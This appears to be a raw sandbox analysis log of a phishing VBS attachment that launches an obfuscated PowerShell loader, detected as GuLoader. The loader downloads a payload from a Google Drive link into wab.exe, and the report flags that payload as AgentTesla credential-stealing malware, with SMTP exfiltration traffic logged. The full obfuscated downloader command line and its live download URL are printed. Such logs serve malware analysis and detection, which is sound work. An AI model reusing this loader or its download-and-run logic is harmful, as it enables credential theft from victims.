2024-04-23 05:54:01 UTC | 216 | OUT | GET /uc?export=download&id=1JmzHY6tMILZoVaehmxP1a_p6vqCurnrS HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
2024-04-23 05:54:01 UTC | 1582 | IN | HTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Tue, 23 Apr 2024 05:54:01 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1JmzHY6tMILZoVaehmxP1a_p6vqCurnrS&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-pLo-SQ53MpStYPtq1FYxAA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49724 | 142.251.35.161 | 443 | 5808 | C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-23 05:54:01 UTC | 258 | OUT | GET /download?id=1JmzHY6tMILZoVaehmxP1a_p6vqCurnrS&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
2024-04-23 05:54:02 UTC | 4764 | IN | HTTP/1.1 200 OK
                                                                                  X-GUploader-UploadID: ABPtcPrBIZBX_skfQSCXDToD_n_xm8SmNUIsH5mAZWSNpQKFg55otl-zCgdrCUgLTJuG7juVeL4
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Security-Policy: sandbox
                                                                                  Content-Security-Policy: default-src 'none'
                                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                                  X-Content-Security-Policy: sandbox
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Content-Disposition: attachment; filename="DlDFxwFOqSzRncinOotjHdfVW167.bin"
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Access-Control-Allow-Credentials: false
                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, 
X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-user-App-ID-Token, X-Earth-user-Computation-Profile, X-Earth-user-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 249920
                                                                                  Last-Modified: Mon, 22 Apr 2024 07:06:33 GMT
                                                                                  Date: Tue, 23 Apr 2024 05:54:02 GMT
                                                                                  Expires: Tue, 23 Apr 2024 05:54:02 GMT
                                                                                  Cache-Control: private, max-age=0
                                                                                  X-Goog-Hash: crc32c=YNs62g==
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49725 | 172.67.74.152 | 443 | 5808 | C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-23 05:54:05 UTC | 155 | OUT | GET / HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                  Host: api.ipify.org
                                                                                  Connection: Keep-Alive
2024-04-23 05:54:05 UTC | 211 | IN | HTTP/1.1 200 OK
                                                                                  Date: Tue, 23 Apr 2024 05:54:05 GMT
                                                                                  Content-Type: text/plain
                                                                                  Content-Length: 14
                                                                                  Connection: close
                                                                                  Vary: Origin
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 878b98d2adce0f36-EWR
                                                                                  2024-04-23 05:54:05 UTC14INData Raw: 31 35 34 2e 31 36 2e 31 39 32 2e 31 36 33
                                                                                  Data Ascii: 154.16.192.163


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Apr 23, 2024 07:54:07.950046062 CEST | 587 | 49726 | 66.29.159.53 | 192.168.2.6 | 220 PrivateEmail.com prod Mail Node
Apr 23, 2024 07:54:07.950285912 CEST | 49726 | 587 | 192.168.2.6 | 66.29.159.53 | EHLO 724536
Apr 23, 2024 07:54:08.097856045 CEST | 587 | 49726 | 66.29.159.53 | 192.168.2.6 | 250-mta-06.privateemail.com
250-PIPELINING
250-SIZE 81788928
250-ETRN
250-AUTH PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-CHUNKING
250 STARTTLS
Apr 23, 2024 07:54:08.098038912 CEST | 49726 | 587 | 192.168.2.6 | 66.29.159.53 | STARTTLS
Apr 23, 2024 07:54:08.245395899 CEST | 587 | 49726 | 66.29.159.53 | 192.168.2.6 | 220 Ready to start TLS
Apr 23, 2024 07:54:11.297290087 CEST | 587 | 49727 | 66.29.159.53 | 192.168.2.6 | 220 PrivateEmail.com prod Mail Node
Apr 23, 2024 07:54:11.297785044 CEST | 49727 | 587 | 192.168.2.6 | 66.29.159.53 | EHLO 724536
Apr 23, 2024 07:54:11.446373940 CEST | 587 | 49727 | 66.29.159.53 | 192.168.2.6 | 250-mta-06.privateemail.com
250-PIPELINING
250-SIZE 81788928
250-ETRN
250-AUTH PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-CHUNKING
250 STARTTLS
Apr 23, 2024 07:54:11.446629047 CEST | 49727 | 587 | 192.168.2.6 | 66.29.159.53 | STARTTLS
Apr 23, 2024 07:54:11.594088078 CEST | 587 | 49727 | 66.29.159.53 | 192.168.2.6 | 220 Ready to start TLS

                                                                                  Target ID:0
                                                                                  Start time:07:53:24
                                                                                  Start date:23/04/2024
                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Swift_Message#1234323456.vbs"
                                                                                  Imagebase:0x7ff744ff0000
                                                                                  File size:170'496 bytes
                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:2
                                                                                  Start time:07:53:24
                                                                                  Start date:23/04/2024
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Forsyningssikkerhed = 1;$Skydevinduer172='Substrin';$Skydevinduer172+='g';Function Phenolsulphonate($Sklmsstykkets){$Hvornaar=$Sklmsstykkets.Length-$Forsyningssikkerhed;For($Rekursmyndighedens15=5; $Rekursmyndighedens15 -lt $Hvornaar; $Rekursmyndighedens15+=(6)){$Palatoglossal+=$Sklmsstykkets.$Skydevinduer172.Invoke($Rekursmyndighedens15, $Forsyningssikkerhed);}$Palatoglossal;}function Multikunsts($Gennemskylning){. ($diffusionism) ($Gennemskylning);}$Hydrorhiza=Phenolsulphonate ' KonnMrei toStudiz Chari PlanlStryclun,idaSlger/ elvs5Bowdl.Bes f0Srgem Afski(forduWKa itiFribonBogstdMopokoDriftwetagesBlodr AfpolNForbrTSmaav Albue1Formi0M.lia.An,va0Canyo; Jern sa meW,ilviistedenPoula6Alcdi4Aksel;Jum o AftrrxBesmr6Tidsf4 ,ell;Spect Opercr ,ortv ycon:Tomba1Salva2De.im1 erv.Absi.0Spgel)Tinte KugleGdrawleInte.c,ilmukSt ntoArmsl/ Otte2 T.ng0Resub1Grand0Del e0Misp 1Plows0Je,ns1Feath NgenFUnderiFarthrthroweCo,taf PogooChookxtalje/Haveb1Ret.r2luxur1O.set.Mng e0Exe,u ';$Digteriske=Phenolsulphonate 'Udkl,U StocsBonnbeLystyr nif-.icliAPrevagko oneAttranTranctChon ';$Unbaptise=Phenolsulphonate 'Ga,brhWobbltMilietSpatipUnds sUprob: Cock/Maal./Forh dRetskrTa.rii lucovFrarae Parf. 
ForbgJolleoCrazio BygggFalsklRecepeFyrvr.Arm,rcWalllo Afkrm Zigg/Byud.u EftecBesgs?je.neeVandsxUnrecpSkdero,iblir Gu,ttsuccu=U gendTilp o Reliw HenknSkraalBromoo ,eora.ockedArelh&InderiGrisgd T.nn= Stif1 ,ignr irlo6 Bela8fo,pe8be,anrFo.siMYaretFDenot1A,sgeEMormyK Til.KSt.alwSeriatHackb1Wagge9I.fuskNut,iWTyv gaDrgliHJurymj K,stjLamp,LKultuQTomastspyttO iteMRenliQS,hinJ.itsthesop,-,oboteClass6Klike ';$Polemiseres=Phenolsulphonate 'Owlis>G und ';$diffusionism=Phenolsulphonate ' ideoiSjakke Tru,x,arer ';$Offtype='Danernes';Multikunsts (Phenolsulphonate 'AnthrSBooteeHomeltRe ov-Do,anCSei noSigaunKonklt Gce.eNaturnSchretom.or Flkke- IndtP O reaS.lemtElmeth Comm PyritTLempe:.oksa\AftalHA.pomaSupern FyradPlanlwEx ger nguliGlamot Faste vale. cac tSago x .emitFrihe Ekstr-DisciVKitcha siel .loduTilste P im Dish$Beac.OOrth,f Platfte,antDioceyOrbitpDeranePseud;d.cim ');Multikunsts (Phenolsulphonate 'AnfgtiSu,pffVascu jlk(reo.ttEjdameMuldzsKatakt Parc- DdempMaamca.remktGas rhMoist Sel T.alae:Lset \Ski pHIsochaMyodenItalid Tituw rsmar ,rooi M crt Uregeferro.ManattGeledxSalontC eap) .ono{Softwetre,ix Accei PlantUnsha}Ollco;Spri. 
');$Overreach161 = Phenolsulphonate 'KogekeStockcRedubhOverco erri rh,ce%zo.elaTch,tpDusinphove.d cyclaCoendtNonr.aFly.e%Antit\WaughAImmormPhre.aDistur .oncaKristnF llbtBevikfCultiaKlav,r SamevUaktueGaskar TrlbsPreac.,dfrlBSundriMarkep Milj Overw&Kastr&Reall Sl.deJu,elcInimihRetrao.nade Pfa.z$.ocho ';Multikunsts (Phenolsulphonate ' ngdo$ DezigPlacelspr nosuburbroupea Tabel tech:Shallf PansuUdt.nn dataksk,frtWilyciOnsweo.ebegnTeabos AutotP vepe SatigFrostnErgotiBr,epnSysteg P,ore Lin.nP stbsH,ldo=Slosh(Tl.enc,arsampaneldCad c shel/JapaccNaitl Gla.s$naboiO,onprvQuenteB,llerRedfirDrouge ChamaHjem c redhNedlg1Tvist6Physo1Hespe)Taleg ');Multikunsts (Phenolsulphonate 'Multi$ BogpgMahoglForudounsolbYmpnia,angblSynta:ernriT ,esueAddergfy kllAn ipvA bitrLamelkNummesHeatea.agterNum.rbButyreOverfjCurvid ImmueInimisUnidi=C ris$HomosU ForhnC ondb LivsaU.nacpGnis t Vil,iSm.llsEklateunbra.Cu sosSquilpUdflylDrowniOppilthypoc(Vider$k.nceP Der,oHalfll Do ee LarymTr thi Fde.sectroeLand,rFondsef,sibsFabri)Diskk ');$Unbaptise=$Teglvrksarbejdes[0];Multikunsts (Phenolsulphonate 'Bruge$Reg,lgD.ouglIllegoqueneb mustaSo.welUni,t:blankH OrgavAccule StetdSiddeeSti umGavageIntimlBloms= seneNMag.seArbejwKo ce-SplitOApostb.aratjNonnae ayercInfo tDudel A,tomSFerieyBrus s ,asttM,croe ektm K,rs.DomstN LovpeGur dtRentr.FodboWStrope abonb SmilC,utoklNecroiDe oreH,mannFjerptsamme ');Multikunsts (Phenolsulphonate 'Emp.t$ PrimHImpervInfleeSkaerdUhv seFactumKi gheGrns.lBenyt.T iolHpr.deeNybega Selvd Impoe Sjo.rAntissCo se[ Disk$Rigi.DAren.i affegIridotWor he,eutrr NyheiScutisWorkwkRingleElect]Rando=Tempe$Nit,hHun,inyDimpsdMarihrBottooNytthrChr shS,akki addezstaalaFrste ');$Trichomatosis=Phenolsulphonate ' RadiHInstrvDemulePreexdTolueeFe lvmUnra.ePrimalUdsen.C.untD Tw,noMuddyw ovanSiam.lPertioFlydeastrmkdT.abeFPictuiPatrolLan.beBetyd(Tandp$PlougUFerlinOpbygb OssiaRallypUdtr.t GiviiFlabesUndepe Pist,Dyrep$ReforSLoftekVin srkmperd dr.wdor alePeskyr apo.eTraadrFilteeArresnSans,dEnrinet,anssCardi) Fi,k 
';$Trichomatosis=$funktionstegningens[1]+$Trichomatosis;$Skrddererendes=$funktionstegningens[0];Multikunsts (Phenolsulphonate ' Klud$ProdugSmeltlReovioEpanobUnpreaToteml rum: ugenhElocuefotogl D spi fteu M,utmVurdeeBurthtBladds D kn= Leje( urisTHeelle.etrasKontitD.tin-Fort,PPreveaherret Dellh,rger A ros$RefleSPlastkovinerDiverdrumbud DowcePretrrBev deS ammrFor.ue forknKristdRegleeKommusDupsk)omstn ');while (!$heliumets) {Multikunsts (Phenolsulphonate 'Vager$Anbrig .ewilBilraoOrmazb lukaAllerl .ndi:KetupE demonlitzdvVanadeDyr hjKabins D agkTrenco HellmRech.mHa esu,eedinBjergi Uni,kSupera rypttSol niFlaado,igmenVedheeHyfeunO inesHager=Disen$EksamtG.melr Sekvusign.e pneu ') ;Multikunsts $Trichomatosis;Multikunsts (Phenolsulphonate 'MiscoSPoroct S.ssaLophorflyvetCalyc-PrescS P.eslBeslue.kelleProvspProvi Spal.4Hv.sk ');Multikunsts (Phenolsulphonate 'Syne.$premogN.taal uttoo TrimbKnobuaProfel Kryd:HmosthNonpeeSeatwlIken,iH ldbuStyptmOut.leL kertOvertsUnch.= Disl(TrombTSpr neZoothsCoop t.enna-FrustPPrustaSo rctFiksehVrigh Radio$ArendSBin,mkTrff rhumhudBoatsdFingee,orskrHost,eReadirFors,ePlatonTor,tdUnfureBathys Japo)Strep ') ;Multikunsts (Phenolsulphonate 'Frema$DiphegAge dlJustioIsophbGenina SniplMassa: Lo,aI epefnBroadtTer.orjonosaChromnEffers TrypiPinkitKompei wa.nvboot.ebromilOpslay Fesc=Arnfr$TraskgStranl lesio Han,bAttesa Lua lDogtr:ForbrF.avnea bad.sEpicetPetarlNucleg unstg,irmaehellelKolonsThiopeGlubhrM.ttenLi laeJubbesSladr+excus+ So,s%Stenc$UnburTThickeKrig gScavelB ssevAgterrOsprekP.antsV rieaI oburUnsupbAnodieTan,sj .imed Omste Rek,sKirke.LagtecLoxodoLeptiuAdvecn Acyltre,ol ') ;$Unbaptise=$Teglvrksarbejdes[$Intransitively];}Multikunsts (Phenolsulphonate 'Boot.$ ArkigAnalylClamaoPetrob DragaattaclRegen:KonjuRGadekePresie S.olvundubiTongmdBra.ceS.cernLjertc demoeFilmk .bre= Spo, kerygG ha.ieFrosttWilli-KopisC Systo NonenPrfertKorpueThrean log,tLacew Sper.$ ArgySDe.takov.rprSkjoldPounddKa ege rapr FyreeKon.rrTo deeDuodrnBl dgdMotioeDelins Snug ');Multikunsts 
(Phenolsulphonate 'Coppe$.illeg ShamlS.ampo.sksnbM skiaFu igldefen:Tr,inACowpadHoc,er,tovteTillgnMyoloaUnautl,ampeeLydincBalant.topfo CentmOu ruyOvert Spumo=Marke Null[Srg dSFabuly noggsUdefrtDromeePr,apmUnfra.ScreeCSl,beoAlantnA canvUfremeMus.irReacktCandy]Areol:Vanro:de.ilFSkovmrFrodio,roatmUv.nnBPern.a B,ozsSubeleInter6 krmm4.eviaSPos,mtp.etirKnlfti,ertin M tagT lla( B mb$ MonoRAdganeEditaeAftrrvUnproiIndgidIntereeksponUn.ercTapwoeNeo o)Arun, ');Multikunsts (Phenolsulphonate ' Opdi$RattogSme,glhidsio Ldreb Sp daForcel Arbo:dualiD RebeyOestrrS traeLandbpH,anda.nthrrNeo,hkNatioeAurelnSky,d Neu.=Fa,at Infer[AngelSSuperyUnpursCropptHumpleVi.kemautoi.AutocTHorseeKontox BundtAf ek.SpyttESvmmenMyriccDeu,eoDybdedCho.di Wiren kavag Vitt]athir:Regns: offeALuannSEncykCUlt.aIsequeICoxit.Kit.yGSpoereNr.sttN.neqSAfluktFl.ntrCleidi CiganPu itg kreo(Quill$Ekse Aknibtd ElekrAlisoePosttnRekreaTranslIndkoeUdskac FjodtPlan,oC lqum Mo ayVelvi)Skrat ');Multikunsts (Phenolsulphonate 'Ante.$.eatlgStrailadmo.oTran,bR,sula Sal lKostu:,orteR CavauVgav tNs.ebtRecgee aduldBonde1,urit7 Zion2Hgted= dmin$BltedDKbes.yUncomrSu.akehighbpScutkaPseudr ,avokGle.me,eotrn Opsl.So,acs,priluTunnebTernssSlvrvtInsusr Bul.i kulnBrgedgFarmb(Posit2Skuff9 Impl4Bello9 Hils2Edwar8Naomi,Amman2 Dors6neddy9 hakk8Jeopa7 ono)Pross ');Multikunsts $Rutted172;"
                                                                                  Imagebase:0x7ff6e3d50000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2841439577.0000015930831000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:07:53:24
                                                                                  Start date:23/04/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff66e660000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:4
                                                                                  Start time:07:53:26
                                                                                  Start date:23/04/2024
                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Amarantfarvers.Bip && echo $"
                                                                                  Imagebase:0x7ff783250000
                                                                                  File size:289'792 bytes
                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:5
                                                                                  Start time:07:53:33
                                                                                  Start date:23/04/2024
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" [script argument identical to the command line of Target ID 2]
                                                                                  Imagebase:0xdf0000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2685556300.0000000008A50000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2677071576.0000000005FE4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2686037167.0000000009DB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:6
                                                                                  Start time:07:53:34
                                                                                  Start date:23/04/2024
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Amarantfarvers.Bip && echo $"
                                                                                  Imagebase:0x1c0000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:11
                                                                                  Start time:07:53:52
                                                                                  Start date:23/04/2024
                                                                                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                                  Imagebase:0x6a0000
                                                                                  File size:516'608 bytes
                                                                                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.3626677690.0000000021FB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3626677690.0000000021F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.3626677690.0000000021F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.3626677690.0000000021FAC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000B.00000002.3597768413.0000000004720000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2861558258.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffd343d0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6bc553c56f9f475327a4940f6bc14faae0e1fbd3b79a313b7b69165ffac2ae89
                                                                                    • Instruction ID: a7ead1cd39b32277d1d99c5aab7a5fde672cc53e04a580223b28a13708f54dc8
                                                                                    • Opcode Fuzzy Hash: 6bc553c56f9f475327a4940f6bc14faae0e1fbd3b79a313b7b69165ffac2ae89
                                                                                    • Instruction Fuzzy Hash: 32028330A09A4E8FEBA8EF28D8957F937E1FF56300F04427AD44DC7291CB79A9458B41
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2861558258.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffd343d0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 475661fa2bea2ad010dbadaabcb712634f34b0c2fb32ff758d88cf4487586a3e
                                                                                    • Instruction ID: 05cdcda00e838da33b4b109a082bc95675332de565e8b2def83379feaf4cd531
                                                                                    • Opcode Fuzzy Hash: 475661fa2bea2ad010dbadaabcb712634f34b0c2fb32ff758d88cf4487586a3e
                                                                                    • Instruction Fuzzy Hash: 6AF1A630A09A4E8FEBA8EF28C8A57F977D1FF56310F04423AD44DC7295CE79A5448B81
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2861558258.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffd343d0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
